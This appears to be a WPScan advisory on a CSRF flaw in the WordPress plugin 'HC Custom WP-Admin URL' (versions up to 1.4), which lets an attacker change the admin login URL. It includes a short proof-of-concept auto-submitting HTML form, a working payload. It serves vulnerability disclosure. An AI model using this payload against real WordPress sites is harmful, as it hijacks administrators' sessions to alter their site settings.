How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

HC Custom WP-Admin URL <= 1.4 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack, allowing them to change the login URL

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
    <input type="text" name="custom_wpadmin_slug" value="secret">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

hc-custom-wp-admin-url

No known fix - plugin closed

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

bb0efc5e-044b-47dc-9101-9aae40cdbaa5

Timeline

Publicly Published

2022-05-18 (about 3 months ago)

Added

2022-05-18 (about 3 months ago)

Last Updated

2022-05-18 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin